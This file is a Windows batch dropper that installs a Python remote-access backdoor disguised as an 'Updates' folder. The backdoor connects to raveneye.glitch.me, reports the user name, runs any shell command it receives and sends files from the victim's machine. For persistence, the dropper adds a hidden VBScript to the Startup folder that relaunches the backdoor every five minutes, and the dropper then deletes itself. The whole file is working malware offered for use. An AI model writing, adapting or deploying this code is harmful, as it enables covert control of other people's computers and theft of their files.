REM Set the path for the Updates folder on C drive
set "updates_folder=C:\Updates"

REM Create the Updates folder on C drive
mkdir "%updates_folder%" 2>nul

REM Create Python script file (main.py)
echo.>"%updates_folder%\main.py"
echo.import importlib>>"%updates_folder%\main.py"
echo.import subprocess>>"%updates_folder%\main.py"
echo.import os>>"%updates_folder%\main.py"
echo.try: __import__('socketio')>>"%updates_folder%\main.py"
echo.except: subprocess.check_call(['pip', 'install', 'python-socketio', 'websocket-client', 'requests'])>>"%updates_folder%\main.py"
echo.import socketio>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.sio = socketio.Client()>>"%updates_folder%\main.py"
echo.on = 'http://raveneye.glitch.me/'>>"%updates_folder%\main.py"
echo.off = 'http://localhost:3000/'>>"%updates_folder%\main.py"
echo.url = on>>"%updates_folder%\main.py"
echo.class Session:>>"%updates_folder%\main.py"
echo.    def __init__(self):>>"%updates_folder%\main.py"
echo.        self.current_directory = os.getcwd()>>"%updates_folder%\main.py"
echo.        self.exit_requested = False>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.session = Session()>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.@sio.on('connect')>>"%updates_folder%\main.py"
echo.def on_connect():>>"%updates_folder%\main.py"
echo.    global session>>"%updates_folder%\main.py"
echo.    whoami_output = execute_command('whoami')>>"%updates_folder%\main.py"
echo.    sio.emit('intro', whoami_output[:-1])>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.@sio.on('message')>>"%updates_folder%\main.py"
echo.def on_message(msg):>>"%updates_folder%\main.py"
echo.    global session>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.    if msg.lower() == 'exit':>>"%updates_folder%\main.py"
echo.        session.exit_requested = True>>"%updates_folder%\main.py"
echo.        sio.disconnect()>>"%updates_folder%\main.py"
echo.        return>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.    if msg.startswith('cd '):>>"%updates_folder%\main.py"
echo.        try:>>"%updates_folder%\main.py"
echo.            os.chdir(msg[3:].strip())>>"%updates_folder%\main.py"
echo.            session.current_directory = os.getcwd()>>"%updates_folder%\main.py"
echo.            sio.emit('message', f"Changed directory to: {session.current_directory}")>>"%updates_folder%\main.py"
echo.        except Exception as e:>>"%updates_folder%\main.py"
echo.            sio.emit('message', f"Error changing directory: {str(e)}")>>"%updates_folder%\main.py"
echo.    elif msg.startswith('download '):>>"%updates_folder%\main.py"
echo.        send_file(session.current_directory + '/' + msg[9:])>>"%updates_folder%\main.py"
echo.    else:>>"%updates_folder%\main.py"
echo.        output = execute_command(msg)>>"%updates_folder%\main.py"
echo.        sio.emit('message', output)>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.def execute_command(command):>>"%updates_folder%\main.py"
echo.    try:>>"%updates_folder%\main.py"
echo.        result = subprocess.run(command, shell=True, capture_output=True, text=True, cwd=session.current_directory)>>"%updates_folder%\main.py"
echo.        return result.stdout if result.returncode == 0 else f"Error: {result.stderr}">>"%updates_folder%\main.py"
echo.    except Exception as e:>>"%updates_folder%\main.py"
echo.        return f"Error: {str(e)}">>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.@sio.event>>"%updates_folder%\main.py"
echo.def updata(data):>>"%updates_folder%\main.py"
echo.    file_name = data['fileName']>>"%updates_folder%\main.py"
echo.    file_data = data['file']>>"%updates_folder%\main.py"
echo.    with open(file_name, 'wb') as file:>>"%updates_folder%\main.py"
echo.        file.write(file_data)>>"%updates_folder%\main.py"
echo.    sio.emit('message', 'Received!')>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.def send_file(file_path):>>"%updates_folder%\main.py"
echo.    file_name = os.path.basename(file_path)>>"%updates_folder%\main.py"
echo.    with open(file_path, "rb") as file:>>"%updates_folder%\main.py"
echo.        file_data = file.read()>>"%updates_folder%\main.py"
echo.        sio.emit('file_transfer', {'file_name': file_name, 'file_data': file_data})>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.sio.connect(url)>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"
echo.try:>>"%updates_folder%\main.py"
echo.    while not session.exit_requested:>>"%updates_folder%\main.py"
echo.        pass>>"%updates_folder%\main.py"
echo.except KeyboardInterrupt:>>"%updates_folder%\main.py"
echo.    pass>>"%updates_folder%\main.py"
echo.finally:>>"%updates_folder%\main.py"
echo.    sio.disconnect()>>"%updates_folder%\main.py"
echo.>>"%updates_folder%\main.py"

REM Create Batch script file (starter.bat)
echo.setlocal>"%updates_folder%\starter.bat"
echo.pip show python-socketio >nul 2>nul>>"%updates_folder%\starter.bat"
echo.if errorlevel 1 (>>"%updates_folder%\starter.bat"
echo.    echo Installing python-socketio...>>"%updates_folder%\starter.bat"
echo.    pip install python-socketio -q>>"%updates_folder%\starter.bat"
echo.) else (>>"%updates_folder%\starter.bat"
echo.    echo python-socketio is already installed.>>"%updates_folder%\starter.bat"
echo.)>>"%updates_folder%\starter.bat"
echo.pip show websocket-client >nul 2>nul>>"%updates_folder%\starter.bat"
echo.if errorlevel 1 (>>"%updates_folder%\starter.bat"
echo.    echo Installing websocket-client...>>"%updates_folder%\starter.bat"
echo.    pip install websocket-client -q>>"%updates_folder%\starter.bat"
echo.) else (>>"%updates_folder%\starter.bat"
echo.    echo websocket-client is already installed.>>"%updates_folder%\starter.bat"
echo.)>>"%updates_folder%\starter.bat"
echo.endlocal>>"%updates_folder%\starter.bat"
echo.>>"%updates_folder%\starter.bat"
echo.@echo off>>"%updates_folder%\starter.bat"
echo.:loop>>"%updates_folder%\starter.bat"
echo.pythonw C:\Updates\main.py>>"%updates_folder%\starter.bat"
echo.timeout /t 300>>"%updates_folder%\starter.bat"
echo.goto loop>>"%updates_folder%\starter.bat"

REM Create VBScript file (starter.vbs) in the Startup folder
set "startup_folder=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
echo.>"%startup_folder%\starter.vbs"
echo.CreateObject("Wscript.Shell").Run "C:\Updates\starter.bat",0,True>>"%startup_folder%\starter.vbs"

del setup.bat
